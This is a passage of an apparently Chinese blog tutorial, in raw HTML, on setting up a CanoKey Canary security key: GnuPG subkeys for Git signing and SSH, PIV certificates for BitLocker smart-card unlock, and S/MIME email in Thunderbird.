class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line">$ gpg --expert --full-gen-key</span><br><span class="line"></span><br><span class="line">gpg (GnuPG) 2.3.4; Copyright (C) 2021 g10 Code GmbH</span><br><span class="line">This is free software: you are free to change and redistribute it.</span><br><span class="line">There is NO WARRANTY, to the extent permitted by law.</span><br><span class="line"></span><br><span class="line">Please select what kind of key you want:</span><br><span class="line"></span><br><span class="line"> (11) ECC (set your own capabilities)</span><br><span class="line"></span><br><span class="line">Your selection? 11</span><br><span class="line"></span><br><span class="line"># 推荐使用 ECC 算法</span><br><span class="line"></span><br><span class="line">Possible actions for this ECC key: Sign Certify Authenticate</span><br><span class="line">Current allowed actions: Sign Certify</span><br><span class="line"></span><br><span class="line"> (S) Toggle the sign capability</span><br><span class="line"></span><br><span class="line">Your selection? s</span><br><span class="line"></span><br><span class="line"># 主密钥只保留 Certify 功能,其他功能使用子密钥</span><br><span class="line"></span><br><span class="line">Possible actions for this ECC key: Sign Certify Authenticate</span><br><span class="line">Current allowed actions: Certify</span><br><span class="line"></span><br><span class="line"> (Q) Finished</span><br><span class="line"></span><br><span class="line">Your selection? q</span><br><span class="line"></span><br><span class="line">Please select which elliptic curve you want:</span><br><span class="line"></span><br><span class="line"> (1) Curve 25519 *default*</span><br><span class="line"></span><br><span class="line">Your selection? 1</span><br><span class="line"></span><br><span class="line">Please specify how long the key should be valid.</span><br><span class="line"></span><br><span class="line"> <n>y = key expires in n years</span><br><span class="line"></span><br><span class="line">Key is valid for? (0) 10y</span><br><span class="line">Key does not expire at all</span><br><span class="line">Is this correct? (y/N) y</span><br><span class="line"></span><br><span class="line"># 主密钥建议设置5-10年有效期,防止由于个人原因遗失后不可控。</span><br><span class="line"></span><br><span class="line">Real name: Editst</span><br><span class="line">Email address: editst@example.com</span><br><span class="line">Comment:</span><br><span class="line">You selected this USER-ID:</span><br><span class="line"> "Editst <editst@example.com>"</span><br><span class="line"></span><br><span class="line"># 这里建议直接设置成GitHub上的对应的邮箱</span><br><span class="line"></span><br><span class="line">Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? o</span><br><span class="line"></span><br><span class="line">We need to generate a lot of random bytes. It is a good idea to perform</span><br><span class="line">some other action (type on the keyboard, move the mouse, utilize the</span><br><span class="line">disks) during the prime generation; this gives the random number</span><br><span class="line">generator a better chance to gain enough entropy.</span><br><span class="line"></span><br><span class="line"># Windnows 下会弹出窗口输入密码,注意一定要保管好!!!</span><br><span class="line"></span><br><span class="line">gpg: revocation certificate stored as 'C:\\Users\\XXX\\AppData\\Roaming\\gnupg\\openpgp-revocs.d\\68697537A54B1F0BFC05E1D9787E848E1A98D086.rev'</span><br><span class="line">public and secret key created and signed.</span><br><span class="line"></span><br><span class="line"># 会自动生成吊销证书,注意保存到安全的地方</span><br><span class="line"></span><br><span class="line">pub ed25519/787E848E1A98D086 2022-01-01 [C]</span><br><span class="line"> Key fingerprint = 6869 7537 A54B 1F0B FC05 E1D9 787E 848E 1A98 D086</span><br><span class="line">uid Editst <editst@example.com></span><br><span class="line"></span><br></pre></td></tr></table></figure><h4 id="2-生成子密钥"><a href="#2-生成子密钥" class="headerlink" title="2.生成子密钥"></a>2.生成子密钥</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">$ gpg --fingerprint --keyid-format long -K</span><br><span class="line">C:\Users\XXX\AppData\Roaming\gnupg\pubring.kbx</span><br><span class="line">------------------------------------------------</span><br><span class="line">sec ed25519/787E848E1A98D086 2022-01-01 [C]</span><br><span class="line"> Key fingerprint = 6869 7537 A54B 1F0B FC05 E1D9 787E 848E 1A98 D086</span><br><span class="line">uid [ultimate] Editst <editst@example.com></span><br><span class="line"></span><br><span class="line">$ gpg --quick-add-key 68697537A54B1F0BFC05E1D9787E848E1A98D086 cv25519 encr 5y</span><br><span class="line">$ gpg --quick-add-key 68697537A54B1F0BFC05E1D9787E848E1A98D086 ed25519 auth 5y</span><br><span class="line">$ gpg --quick-add-key 68697537A54B1F0BFC05E1D9787E848E1A98D086 ed25519 sign 5y</span><br><span class="line"></span><br><span class="line"># 子密钥建议设置最多5年有效期</span><br></pre></td></tr></table></figure><p>再次查看目前的私钥,可以看到已经包含了这三个子密钥。 </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">gpg --fingerprint --keyid-format long -K</span><br><span class="line">C:\Users\XXX\AppData\Roaming\gnupg\pubring.kbx</span><br><span class="line">------------------------------------------------</span><br><span class="line">sec ed25519/787E848E1A98D086 2022-01-01 [C]</span><br><span class="line"> Key fingerprint = 6869 7537 A54B 1F0B FC05 E1D9 787E 848E 1A98 D086</span><br><span class="line">uid [ultimate] Editst <editst@example.com></span><br><span class="line">ssb ed25519/055917609C9C0D7B 2022-01-01 [S] [expires: 2024-01-01]</span><br><span class="line"> Key fingerprint = E99F 3D15 7ACF 7E24 3DC8 FFE7 0559 1760 9C9C 0D7B</span><br><span class="line">ssb ed25519/05F4A6C335157258 2022-01-01 [A] [expires: 2024-01-01]</span><br><span class="line"> Key fingerprint = C4B9 7EEC 4060 F856 7A4D 2956 05F4 A6C3 3515 7258</span><br><span class="line">ssb cv25519/C5B8214C3AD21C6C 2022-01-01 [E] [expires: 2024-01-01]</span><br><span class="line"> Key fingerprint = E39E E067 3233 BD73 7ED1 15F1 C5B8 214C 3AD2 1C6C</span><br><span class="line"></span><br></pre></td></tr></table></figure><h4 id="3-备份-备份-备份"><a href="#3-备份-备份-备份" class="headerlink" title="3.备份 备份 备份"></a>3.备份 备份 备份</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"># 公钥</span><br><span class="line">$ gpg -ao public-key.pub --export 787E848E1A98D086</span><br><span class="line"></span><br><span class="line"># 吊销证书</span><br><span class="line">路径: %APPDATA%\gnupg\openpgp-revocs.d\68697537A54B1F0BFC05E1D9787E848E1A98D086.rev</span><br><span class="line"></span><br><span class="line"># 主密钥和三个子密钥</span><br><span class="line">gpg -ao sec-key.asc --export-secret-key 787E848E1A98D086!</span><br><span class="line">gpg -ao sign-key.asc --export-secret-key 055917609C9C0D7B!</span><br><span class="line">gpg -ao auth-key.asc --export-secret-key 05F4A6C335157258!</span><br><span class="line">gpg -ao encr-key.asc --export-secret-key C5B8214C3AD21C6C!</span><br></pre></td></tr></table></figure><p>把这些文件拿7z打个加密压缩包,密码用KeePass生成一个够长的保存,然后找个你喜欢的网盘存好或者刻张光盘放衣柜里。 </p><h4 id="4-导入-Canokey"><a href="#4-导入-Canokey" class="headerlink" title="4.导入 Canokey"></a>4.导入 Canokey</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><span class="line">$ gpg --edit-card</span><br><span class="line">Reader ...........: canokeys.org OpenPGP PIV OATH 0</span><br><span class="line">Manufacturer .....: CanoKeys</span><br><span class="line">......</span><br><span class="line"></span><br><span class="line"># 进入 Admin 模式</span><br><span class="line">gpg/card> admin</span><br><span class="line">Admin commands are allowed</span><br><span class="line"></span><br><span class="line">gpg/card> passwd</span><br><span class="line">gpg: OpenPGP card no. xxxxxxxxxxxxxxxxxxxxxxxxxxx detected</span><br><span class="line"></span><br><span class="line">1 - change PIN</span><br><span class="line">2 - unblock PIN</span><br><span class="line">3 - change Admin PIN</span><br><span class="line">4 - set the Reset Code</span><br><span class="line">Q - quit</span><br><span class="line"></span><br><span class="line"># PIN 和 Admin PIN 最好都要改掉</span><br><span class="line"></span><br><span class="line">......</span><br><span class="line"></span><br><span class="line"># 改完后退出</span><br><span class="line">gpg/card>quit</span><br><span class="line"></span><br><span class="line">$ gpg --edit-key 787E848E1A98D086</span><br><span class="line"></span><br><span class="line">sec ed25519/787E848E1A98D086</span><br><span class="line"> created: 2022-01-01 expires: never usage: C</span><br><span class="line"> trust: ultimate validity: ultimate</span><br><span class="line">ssb ed25519/055917609C9C0D7B</span><br><span class="line"> created: 2022-01-01 expires: 2024-01-01 usage: S</span><br><span class="line">ssb ed25519/05F4A6C335157258</span><br><span class="line"> created: 2022-01-01 expires: 2024-01-01 usage: A</span><br><span class="line">ssb cv25519/C5B8214C3AD21C6C</span><br><span class="line"> created: 2022-01-01 expires: 2024-01-01 usage: E</span><br><span class="line">[ultimate] (1). Editst <editst@example.com></span><br><span class="line"></span><br><span class="line">gpg> key 1 # 首先选中第一个子密钥</span><br><span class="line"></span><br><span class="line">gpg> keytocard</span><br><span class="line">Please select where to store the key:</span><br><span class="line"> (1) Signature key</span><br><span class="line">Your selection? 1 # 选择对应插槽</span><br><span class="line"></span><br><span class="line"># 首先输入 OpenPGP 的密码,再输入 OpenPGP Applet 对应的 Admin PIN</span><br><span class="line"># 之后先反选 key 1,再依次选择 key 2,key 3,重复操作即可</span><br><span class="line"></span><br><span class="line">gpg> key 1</span><br><span class="line">gpg> key 2</span><br><span class="line">gpg> keytocard</span><br><span class="line">Please select where to store the key:</span><br><span class="line"> (3) Authentication key</span><br><span class="line">Your selection? 3</span><br><span class="line">gpg> key 2</span><br><span class="line">gpg> key 3</span><br><span class="line">gpg> keytocard</span><br><span class="line">Please select where to store the key:</span><br><span class="line"> (2) Encryption key</span><br><span class="line">Your selection? 2</span><br><span class="line"></span><br><span class="line">gpg> save # 保存修改</span><br><span class="line"></span><br><span class="line"># 查看 Canokey 状态,确认导入成功</span><br><span class="line">$ gpg --card-status</span><br><span class="line">Reader ...........: canokeys.org OpenPGP PIV OATH 0</span><br><span class="line">......</span><br><span class="line">General key info..: sub ed25519/055917609C9C0D7B 2022-01-01 Editst <editst@example.com></span><br><span class="line">sec ed25519/787E848E1A98D086 created: 2022-01-01 expires: never</span><br><span class="line">ssb> cv25519/055917609C9C0D7B created: 2022-01-01 expires: 2024-01-01</span><br><span class="line"> card-no: F1D0 xxxxxxxx</span><br><span class="line">ssb> ed25519/05F4A6C335157258 created: 2022-01-01 expires: 2024-01-01</span><br><span class="line"> card-no: F1D0 xxxxxxxx</span><br><span class="line">ssb> ed25519/C5B8214C3AD21C6C created: 2022-01-01 expires: 2024-01-01</span><br><span class="line"> card-no: F1D0 xxxxxxxx</span><br></pre></td></tr></table></figure><p>看到<code>ssb></code>就可以删掉主密钥了: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --delete-secret-keys 787E848E1A98D086</span><br></pre></td></tr></table></figure><h4 id="5-使用-Canokey"><a href="#5-使用-Canokey" class="headerlink" title="5.使用 Canokey"></a>5.使用 Canokey</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"># 导入公钥</span><br><span class="line">$ gpg --import public-key.pub</span><br><span class="line">$ gpg --edit-card</span><br><span class="line">$ gpg/card> fetch</span><br><span class="line"></span><br><span class="line"># 查看本地的私钥,确定已经指向了Canokey</span><br><span class="line">$ gpg --fingerprint --keyid-format long -K</span><br><span class="line">C:\Users\XXX\AppData\Roaming\gnupg\pubring.kbx</span><br><span class="line">------------------------------------------------</span><br><span class="line">sec# ed25519/787E848E1A98D086 2022-01-01 [C]</span><br><span class="line"> Key fingerprint = 6869 7537 A54B 1F0B FC05 E1D9 787E 848E 1A98 D086</span><br><span class="line">uid [ultimate] Editst <editst@example.com></span><br><span class="line">ssb> ed25519/055917609C9C0D7B 2022-01-01 [S] [expires: 2024-01-01]</span><br><span class="line"> Key fingerprint = E99F 3D15 7ACF 7E24 3DC8 FFE7 0559 1760 9C9C 0D7B</span><br><span class="line"> Card serial no. = F1D0 xxxxxxxx</span><br><span class="line">ssb> ed25519/05F4A6C335157258 2022-01-01 [A] [expires: 2024-01-01]</span><br><span class="line"> Key fingerprint = C4B9 7EEC 4060 F856 7A4D 2956 05F4 A6C3 3515 7258</span><br><span class="line"> Card serial no. = F1D0 xxxxxxxx</span><br><span class="line">ssb> cv25519/C5B8214C3AD21C6C 2022-01-01 [E] [expires: 2024-01-01]</span><br><span class="line"> Key fingerprint = E39E E067 3233 BD73 7ED1 15F1 C5B8 214C 3AD2 1C6C</span><br><span class="line"> Card serial no. = F1D0 xxxxxxxx</span><br></pre></td></tr></table></figure><h5 id="5-1-Git-Commit-签名"><a href="#5-1-Git-Commit-签名" class="headerlink" title="5.1 Git Commit 签名"></a>5.1 Git Commit 签名</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ git config --global user.signingkey 055917609C9C0D7B # 子密钥中的签名(S)密钥</span><br><span class="line"></span><br><span class="line"># 之后在 git commit 时增加 -S 参数即可使用 gpg 进行签名,或者直接全局开启:</span><br><span class="line">$ git config commit.gpgsign true</span><br></pre></td></tr></table></figure><h5 id="5-2-SSH-with-gpg-agent"><a href="#5-2-SSH-with-gpg-agent" class="headerlink" title="5.2 SSH with gpg agent"></a>5.2 SSH with gpg agent</h5><p>首先在<code>%AppData%\gnupg\gpg-agent.conf</code>中写入(没有就新建一个):</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">enable-win32-openssh-support</span><br><span class="line">enable-ssh-support</span><br><span class="line">enable-putty-support</span><br></pre></td></tr></table></figure><p>然后运行<code>gpg -k --with-keygrip</code>获取 [A] Subkey 的 Keygrip(40位,虽然看着很像上面的fingerprint但是不一样),写入<code>%AppData%\gnupg\sshcontrol</code>(没有就新建一个),然后开任务管理器,找到<code>gpg-agent.exe</code>,右键结束进程树。<br>然后运行<code>gpg --card-status</code>再把gpg-agent拉起来。</p><p>查看 openSSH 读取到的公钥信息,把输出的公钥信息添加到服务器的<code>~/.ssh/authorized_keys</code> </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ ssh-add -L</span><br><span class="line"></span><br><span class="line">ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAzFAR5puWAj0OflZJVzAJqejVEZCap2NhFJbzedYwX2 cardno:F1D0 xxxxxxxx</span><br></pre></td></tr></table></figure><p>Putty设置:<br><img src="/pictures/canokey-canary/3.png"> </p><p>MobaXterm设置:<br><img src="/pictures/canokey-canary/4.png"> </p><h3 id="PIV"><a href="#PIV" class="headerlink" title="PIV"></a>PIV</h3><p>CanoKey Canary 3.0.0版本的固件是有bug的,参见:<a href="https://docs.canokeys.org/zh-hans/userguide/piv/#11-%E6%94%AF%E6%8C%81%E7%AE%97%E6%B3%95">https://docs.canokeys.org/</a> 但是问题不大,因为PIV一般根本用不到25519<br>CanoKey有4个可以用的密钥槽(不算82、83):<br>  9A:PIV Authentication<br>  9E:Card Authentication<br>  9C:Digital Signature<br>  9D:Key Management<br>虽然写了每个密钥槽是做什么的,但是其实你完全不用管,实际使用时大多可以想塞哪儿就塞哪儿。<br>但是有个容易引发人强迫症的事需要注意,当OpenSC读取卡信息的时候,会以<code>9a->9c->9d->9e</code>的顺序读,也就是说假如你在<code>9c</code>槽存了一个<code>CN=Disappear9 's CanoKey</code>的证书,那么不管后面槽位的证书CN内容是什么,读卡时信息都会一直显示为<code>9c</code>的CN,直到<code>9a</code>存了证书。<br>例如: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">yubico-piv-tool -r canokey -a status</span><br><span class="line">Version: 5.7.0</span><br><span class="line">Slot 9a:</span><br><span class="line"> Algorithm: RSA2048</span><br><span class="line"> Subject DN: CN=Disappear9 's CanoKey, O=D9Lab, C=CN</span><br><span class="line"> Issuer DN: CN=Disappear9 's CanoKey, O=D9Lab, C=CN</span><br><span class="line">Slot 9c:</span><br><span class="line"> Algorithm: RSA2048</span><br><span class="line"> Subject DN: CN=disappear9@outlook.com</span><br><span class="line"> Issuer DN: C=IT, ST=Bergamo, L=Ponte San Pietro, O=Actalis S.p.A., CN=Actalis Client Authentication CA G3</span><br><span class="line">Slot 9d:</span><br><span class="line"> Algorithm: RSA2048</span><br><span class="line"> Subject DN: CN=TEST</span><br><span class="line"> Issuer DN: CN=TEST</span><br><span class="line">PIN tries left: 3</span><br></pre></td></tr></table></figure><p>在<code>Thunderbird</code>中查看时:<br><img src="/pictures/canokey-canary/5.png"> </p><p>所以如果你和我一样容易突然犯强迫症,那么可以自己生成一个给Bitlocker用的证书放<code>9a</code>。 </p><h4 id="Bitlocker"><a href="#Bitlocker" class="headerlink" title="Bitlocker"></a>Bitlocker</h4><p>新建一个<code>certreqcfg.ini</code>文件<br>注意:其中的<code>Subject</code>,<code>NotBefore</code>,<code>NotAfter</code>,这几项是可以随意更改的,剩下的不要动,尤其是有些人(比如我)看到2048位RSA会感觉啊好不安全然后改成4096,证书能生成能导入Bitlocker也能正常读到加锁,然后解密的时候就会突发恶疾智能卡无效导致你只能用恢复密钥解密(至少我在win10 LTSC 21H2 和 win11 LTSC上实验过全是这样)。</p><figure class="highlight ini"><figcaption><span>certreqcfg.ini</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">[NewRequest]</span></span><br><span class="line"><span class="attr">Subject</span> = <span class="string">"C=CN,O=D9Lab,CN=Disappear9 's CanoKey"</span></span><br><span class="line"><span class="attr">NotBefore</span> = <span class="number">2025</span>/<span class="number">01</span>/<span class="number">01</span> <span class="number">00</span>:<span class="number">00</span> AM</span><br><span class="line"><span class="attr">NotAfter</span> = <span class="number">2035</span>/<span class="number">01</span>/<span class="number">01</span> <span class="number">00</span>:<span class="number">00</span> AM</span><br><span class="line"><span class="attr">Exportable</span> = <span class="literal">TRUE</span></span><br><span class="line"><span class="attr">KeyLength</span> = <span class="number">2048</span></span><br><span class="line"><span class="attr">HashAlgorithm</span> = <span class="string">"SHA512"</span></span><br><span class="line"><span class="attr">EncryptionAlgorithm</span> = <span class="string">"AES"</span></span><br><span class="line"><span class="attr">EncryptionLength</span> = <span class="number">256</span></span><br><span class="line"><span class="attr">KeySpec</span> = <span class="string">"AT_KEYEXCHANGE"</span></span><br><span class="line"><span class="attr">KeyUsage</span> = <span class="string">"CERT_KEY_ENCIPHERMENT_KEY_USAGE"</span></span><br><span class="line"><span class="attr">KeyUsageProperty</span> = <span class="string">"NCRYPT_ALLOW_DECRYPT_FLAG"</span></span><br><span class="line"><span class="attr">RequestType</span> = Cert</span><br><span class="line"><span class="attr">SMIME</span> = <span class="literal">FALSE</span></span><br><span class="line"></span><br><span class="line"><span class="section">[EnhancedKeyUsageExtension]</span></span><br><span class="line"><span class="attr">OID</span>=<span class="number">1.3</span>.<span class="number">6.1</span>.<span class="number">5.5</span>.<span class="number">7.3</span>.<span class="number">1</span></span><br><span class="line"><span class="attr">OID</span>=<span class="number">1.3</span>.<span class="number">6.1</span>.<span class="number">5.5</span>.<span class="number">7.3</span>.<span class="number">2</span></span><br><span class="line"><span class="attr">OID</span>=<span class="number">1.3</span>.<span class="number">6.1</span>.<span class="number">4.1</span>.<span class="number">311.67</span>.<span class="number">1.1</span></span><br><span class="line"><span class="attr">OID</span>=<span class="number">1.3</span>.<span class="number">6.1</span>.<span class="number">4.1</span>.<span class="number">311.10</span>.<span class="number">3.4</span></span><br><span class="line"><span class="attr">OID</span>=<span class="number">1.3</span>.<span class="number">6.1</span>.<span class="number">4.1</span>.<span class="number">311.10</span>.<span class="number">3.12</span></span><br></pre></td></tr></table></figure><p>运行命令<code>certreq –new certreqcfg.ini certrequest.req</code><br>如果没有错误,那么证书就已经成功生成并安装了。 </p><p>运行命令<code>certmgr.msc</code>打开证书管理器<br><img src="/pictures/canokey-canary/6.png"> </p><p>右键<code>所有任务->导出</code>,选择<code>是,导出私钥</code>,导出pfx文件命名为<code>9a.pfx</code>。</p><p>由于是自签名证书,需要添加注册表允许自签名<br>以管理员权限运行命令</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\FVE /v SelfSignedCertificates /t REG_DWORD /d "1"</span><br></pre></td></tr></table></figure><p>下载安装 <a href="https://developers.yubico.com/yubico-piv-tool/Releases/">yubico-piv-tool</a><br><img src="/pictures/canokey-canary/7.png"> </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"># 确认是否能检测到Canokey</span><br><span class="line">$ yubico-piv-tool -r canokeys -a status</span><br><span class="line"></span><br><span class="line"># 修改 PIN、PUK</span><br><span class="line">$ yubico-piv-tool -r canokeys -a change-pin</span><br><span class="line">$ yubico-piv-tool -r canokeys -a change-puk</span><br><span class="line"></span><br><span class="line"># 导入密钥</span><br><span class="line">$ yubico-piv-tool -r canokeys -s 9a -i 9a.pfx -KPKCS12 -a import-key -a import-cert</span><br><span class="line"></span><br><span class="line"># 初始化 Card Holder Unique Identifier 和 CCC</span><br><span class="line">$ yubico-piv-tool -r canokeys -a set-chuid</span><br><span class="line">$ yubico-piv-tool -r canokeys -a set-ccc</span><br><span class="line"></span><br><span class="line"># 确认是否导入成功</span><br><span class="line">$ yubico-piv-tool -r canokeys -a status</span><br></pre></td></tr></table></figure><p>至此,Canokey 就可以用于进行 Bitlocker 加密了。在使用 Bitlocker 时,选择“使用智能卡”即可。</p><p><strong>清理与善后</strong><br>0.将导出的证书像对待上文中的GPG证书一样进行备份。<br>1.删除导出的包含私钥的证书文件<code>9a.pfx</code>。<br>2.在 Windows 的证书管理器中删掉生成的证书,证书同时存储在<code>个人</code> 和 <code>中间证书颁发机构</code>下,要同时删掉。<br>3.删除申请证书过程中的 ini 和 req 文件。 </p><h4 id="S-MIME电子邮件加密"><a href="#S-MIME电子邮件加密" class="headerlink" title="S/MIME电子邮件加密"></a>S/MIME电子邮件加密</h4><p><strong>准备工作</strong><br><del>从 <a href="https://www.actalis.com/request-s-mime-certificate">Actalis</a> 申请一个免费的S/MIME证书 参考<a href="https://blog.goodboyboy.top/posts/851058316.html">免费申请S/MIME邮箱证书</a></del><br>Actalis的免费证书没了,用<a href="https://shop.certum.eu/s-mime.html">Certum</a>的吧,15欧元两年,教程参考:<a href="https://www.liups.net/2025/10/s-mime-%E8%AF%81%E4%B9%A6%E7%AD%BE%E5%90%8D%E5%8A%A0%E5%AF%86%E7%94%B5%E5%AD%90%E9%82%AE%E4%BB%B6/#%E4%BB%98%E8%B4%B9%E7%9A%84%EF%BC%88%EF%BC%89">使用 S/MIME 证书签名并加密电子邮件</a><br>安装 <a href="https://www.thunderbird.net/zh-CN/thunderbird/all/">Thunderbird</a><br>安装 <a href="https://github.com/OpenSC/OpenSC/releases">OpenSC</a><br>安装 <a href="https://developers.yubico.com/yubico-piv-tool/Releases/">yubico-piv-tool</a> </p><p>导入证书: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ yubico-piv-tool -r canokeys -s 9c -i certificate.p12 -KPKCS12 -a import-key -a import-cert --pin-policy=once</span><br></pre></td></tr></table></figure><p>如果你有不止一个邮箱的证书可以继续导入<code>9d</code>, <code>9e</code>槽位,我们可以在导入命令的后面附加<code>--pin-policy</code>或<code>--touch-policy</code>选项覆盖掉默认规则,防止默认规则下<code>9e</code>槽位可以不经验证被直接使用。详细使用方法参考: <a href="https://developers.yubico.com/yubico-piv-tool/Manuals/yubico-piv-tool.1.html">https://developers.yubico.com/yubico-piv-tool/Manuals/yubico-piv-tool.1.html</a> </p><p><strong>冲突预防</strong><br>如果你依照上文配置了GPG,在不做修改的情况下GPG会和OpenSC起冲突。<br>参考: <a href="https://blog.apdu.fr/posts/2024/12/gnupg-and-pcsc-conflicts-episode-3/">GnuPG and PC/SC conflicts, episode 3</a><br>在<code>%AppData%\gnupg\scdaemon.conf</code>中写入(没有就新建一个):</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">disable-ccid</span><br><span class="line">pcsc-shared</span><br></pre></td></tr></table></figure><p>然后开任务管理器,找到<code>gpg-agent.exe</code>(如有),右键结束进程树。</p><p><strong>配置<code>Thunderbird</code></strong><br><img src="/pictures/canokey-canary/8.png"><br><img src="/pictures/canokey-canary/9.png"><br>选择 <code>C:\Program Files\OpenSC Project\OpenSC\pkcs11\opensc-pkcs11.dll</code> </p><p>加载后就可以看到Canokey了(重用一下上面的图)<br><img src="/pictures/canokey-canary/5.png"> </p><p>选择与邮箱对应的证书<br><img src="/pictures/canokey-canary/10.png"> </p><p>然后在写信时就可以选择签名/加密了<br><img 